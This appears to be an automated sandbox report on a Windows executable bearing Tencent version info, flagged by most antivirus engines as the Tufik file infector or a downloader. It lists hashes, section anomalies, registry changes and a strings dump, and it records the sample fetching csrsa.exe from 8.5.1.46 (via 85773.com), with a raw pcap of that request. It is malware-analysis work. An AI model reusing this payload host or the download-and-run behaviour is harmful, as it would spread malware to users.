Analysis Date: 2015-01-31 05:47:33
MD5: 0d5fa3c498db7daebf5203b157b1d21b
SHA1: 5cbf01d3176340aca7959a52ada6c0a6e4f1f00f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d2c486cf7680c4b2df3b8da3525bfc80 sha1: 35556fd24d77900c77e132e29a81f5142514c058 size: 16384
Section .rdata md5: 07386cc90bc4ac50f17e64f904797c57 sha1: c798f7f04bc987075b3a8e89a96ba8e8bc1a1e6c size: 8192
Section .data md5: 6d82c6128cfab585c51e44cea92557c0 sha1: d741cc747c596dcd56d6b915d21dd88baa491278 size: 4096
Section .rsrc md5: 7c12bec57a3a6226ed1f4b350238bf10 sha1: 8d9a89d83051f87c7ee005f5a7ead6812cfe3311 size: 12288
Section .text md5: acfc6c482a97c8e970a8458717086b86 sha1: 7cbce79b4656ecdcd216df296ff01f39590339bb size: 8192
Note: two sections named .text with different hashes are listed, the second one after .rsrc; this is not what a normal build produces and is worth correlating with the AV verdicts below (e.g. Symantec's "!inf" suffix).
Timestamp: 2013-08-14 07:24:07
Pdb path: D:\smartloader\kernel_proj\trunk\kernel_smartloader\bin\ReleaseA\pdb\KernelSmartLoader.pdb
Version info:
LegalCopyright: Copyright (C) 1998-2013 Tencent. All Rights Reserved
InternalName: KernelSmartLoder
FileVersion: 7, 15, 0, 1
CompanyName: Tencent
ProductName: 腾讯页游微端
ProductVersion: 7, 15, 0, 1
FileDescription: 腾讯页游微端
OriginalFilename: 腾讯页游微端
PEhash: 5c15331f058d653c677361113d2026182f4ddc56
IMPhash: 6b4c95449063674e060dffe4255777ed
AV 360 Safe: Virus.Win32.TuFik.C
AV Ad-Aware: Win32.Tufik.P
AV Alwil (avast): Tufik:Win32:Tufik
AV Arcabit (arcavir): Win32.Tufik.P
AV Authentium: W32/Tufik.A.gen!Eldorado
AV Avira (antivir): TR/Dldr.Genome.agor
AV BullGuard: Win32.Tufik.P
AV CA (E-Trust Ino): Win32/tufik.J
AV CAT (quickheal): W32.Tufik.gen
AV ClamAV: Trojan.Downloader-98394
AV Dr. Web: Trojan.DownLoader.4268
AV Emsisoft: Win32.Tufik.P
AV Eset (nod32): Win32/Tufik.NAA virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Tufik.A.gen!Eldorado
AV F-Secure: Win32.Tufik.P
AV Grisoft (avg): Win32/Tufik.A
AV Ikarus: Virus.Win32.Tufik
AV K7: Error Scanning File
AV Kaspersky: Virus.Win32.Pioneer.ak
AV MalwareBytes: no_virus
AV Mcafee: W32/Tufik
AV Microsoft Security Essentials: Virus:Win32/Tufik.D
AV MicroWorld (escan): Win32.Tufik.P
AV Rising: Win32.Tufik.p
AV Sophos: W32/Tufik-Fam
AV Symantec: W32.Tufik.B!inf
AV Trend Micro: PE_TUFIK.JK
AV VirusBlokAda (vba32): Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 1248 -e 188 -g
Note: drwtsn32 is the Dr. Watson post-mortem debugger; its launch with -p/-e arguments suggests the sample hit an unhandled exception in the sandbox, so the runtime trace below may be incomplete.
Creates Mutex: open
Creates Mutex: DBWinMutex
Winsock DNS: 8.5.1.46
Winsock URL: http://8.5.1.46/csrsa.exe

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1248 -e 188 -g

Network Details:

DNS: 85773.com
Type: A
8.5.1.46
HTTP GET: http://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 8.5.1.46:80
Note: the GET is issued to the IP directly (the Host header in the raw pcap below is 8.5.1.46), while the DNS query for 85773.com resolved to the same address.

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
\
/\@
\

080404b0
7, 15, 0, 1
About
CompanyName
Copyright (C) 1998-2013 Tencent. All Rights Reserved
Copyright (C) 2009
&File
FileDescription
FileVersion
h&About ...
&Help
iE&xit
InternalName
@jjj
KernelSmartLoder
LegalCopyright
OriginalFilename
ProductName
ProductVersion
smartloader
SMARTLOADER
smartloader Version 1.0
StringFileInfo
System
Tencent
Translation
VarFileInfo
VS_VERSION_INFO
"+^ +]
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
[0Y0W0U
100208000000Z
130814074134Z0#
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
1(c) 2006 VeriSign, Inc. - For authorized use only1E0C
200207235959Z0
2Terms of use at https://www.verisign.com/rpa (c)101.0,
??3@YAXPAX@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
92ttVj
9:ttWj
_access
_acmdln
_adjust_fdiv
_amsg_exit
      <assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.762" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@V?$_String_const_iterator@DU?$char_traits@D@std@@V?$allocator@D@2@@2@0@Z
.?AV?$TTenioPtr@VITenioComponentFactory@Tenio@@$0A@@Tenio@@
.?AVtype_info@@
bad allocation
?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE?AV?$_String_iterator@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ
_cexit
_chmod
CloseHandle
CoInitialize
Config\KernelDebug.ini
_configthreadlocale
_controlfp_s
CopyFileA
CoUninitialize
CreateAcceleratorTableA
CreateComponent
CreateDirectoryA
CreateFactory
CreateFileA
CreateProcessA
CreateToolhelp32Snapshot
_crt_debugger_hook
__CxxFrameHandler3
D$0hTR@
D$8SUVW
D$8UVW
@.data
_decode_pointer
DefaultValue
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
DestroyAcceleratorTable
DispatchMessageA
__dllonexit
DllPath
D:\smartloader\kernel_proj\trunk\kernel_smartloader\bin\ReleaseA\pdb\KernelSmartLoader.pdb
D$tSVW
E4h0R@
_encode_pointer
E+QLI4
_except_handler4_common
F0t$h\S@
(f@f;F
FileTimeToLocalFileTime
FileTimeToSystemTime
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z
FreeLibrary
GetACP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetFileAttributesA
GetLocaleInfoA
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
_getpid
GetPrivateProfileIntA
GetPrivateProfileStringA
GetProcAddress
GetProcessTimes
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
GetVersionExA
#http://crl.verisign.com/pca3-g5.crl04
#http://logo.verisign.com/vslogo.gif04
http://ocsp.verisign.com0
https://www.verisign.com/cps0*
https://www.verisign.com/rpa0
hx5G e
	image/gif0!0
_initterm
_initterm_e
InterlockedCompareExchange
InterlockedExchange
_invalid_parameter_noinfo
_invoke_watson
IsDebuggerPresent
_ismbblead
kernel
Kernel
KERNEL32.dll
KernelFactory.dll
kernel.ini
KernelPluginLoader.dll
KERNELSMARTLOADER
KERNELSMARTLOADER::
KernelTenFact.dll
KernelTenio.ini
Kuinet_ntoa
KuWs2_32
:KuWSAStartup
LoadLibraryA
_localtime64
Log2File
_mbschr
_mbsnbcpy_s
_mbsrchr
memset
MessageBoxA
Module32First
Module32Next
MSVCP80.dll
MSVCR80.dll
NotUseDefaultDllPath
	?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
ole32.dll
_onexit
OutputDebugStringA
__p__commode
__p__fmode
pluginloader
Process32First
Process32Next
productname
QQ.exe
QQPenguin
QSWh\U@
QueryPerformanceCounter
`.rdata
ReadFile
Recycler
Redirect
ReleaseFactory
?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
Run() bRun=%d
Run() szIniPath=%s szProductName=%s
__set_app_type
SetEndOfFile
SetFilePointer
SetUnhandledExceptionFilter
__setusermatherr
%s.exe
shell32
SHELL32.dll
SHGetSpecialFolderPathA
ShowErrorInfo
ShowTraceInfo
ShowVerboseInfo
%s\KernelLog\%02d%02d_%02d%02d%02d%03d.log
%s\KernelLog\Log.log
_snprintf_s
%s\QQPet\Registrar
%s\QQPet\Registrar\%s.ini
"%s" %s
%s\%s.exe
%s:%s %s
%s\Temp\KernelUpdate\%s
strcat_s
strcpy_s
strftime
_stricmp
strtoul
?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
svLugethostbyname
Symantec Corporation100.
'Symantec Time Stamping Services CA - G2
T$0hdR@
TenioDllFreeMap
[Tenio_Error] Can't find CreateComponent().
[Tenio_Error] CreateComponent(ComponentId=%u) return null.
[Tenio_Error] Create ComponentFactory in %s Fail
[Tenio_Error] Load %s Fail.
Tenio Initialize!
TenioSetDllSafe
Tenio Uninitialize!
TerminateProcess
?terminate@@YAXXZ
.text 
@.text 
!This program cannot be run in DOS mode.
_time64
TranslateAcceleratorA
TranslateMessage
T$<RSSj SSS
T$$RVP
t$WhnB@
?_type_info_dtor_internal_method@type_info@@QAEXXZ
uCloseHandle
uCreateFileA
uCreateFileMappingA
uCreateMutexA
uCreateThread
uFindClose
uFindFirstFileA
uFindNextFileA
uGetDriveTypeA
uGetFileSize
uGetLastError
uGetLocalTime
uGetLogicalDriveStringsA
uGetTempPathA
uGlobalAlloc
uGlobalFree
^u%htT@
uLoadLibraryA
ulstrcatA
ulstrcmpA
ulstrcpyA
ulstrlenA
uMapViewOfFile
UnhandledExceptionFilter
_unlink
_unlock
updateexe
URLDownloadToFileA
Urlmon
user32
USER32.dll
uSetEndOfFile
uSetFilePointer
ushlwapi
uSleep
uStrStrIA
uUnmapViewOfFile
uWriteFile
%VeriSign Class 3 Code Signing 2010 CA
%VeriSign Class 3 Code Signing 2010 CA0
<VeriSign Class 3 Public Primary Certification Authority - G50
VeriSign, Inc.1
VeriSignMPKI-2-80
VeriSign Trust Network1:08
VeriSign Trust Network1;09
version
Version
vShellExecuteA
_vsnprintf_s
~?VWSU
WINDOW
WriteFile
wRtlMoveMemory
WVh,T@
_XcptFilter
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
%Y/%m/%d %H:%M:%S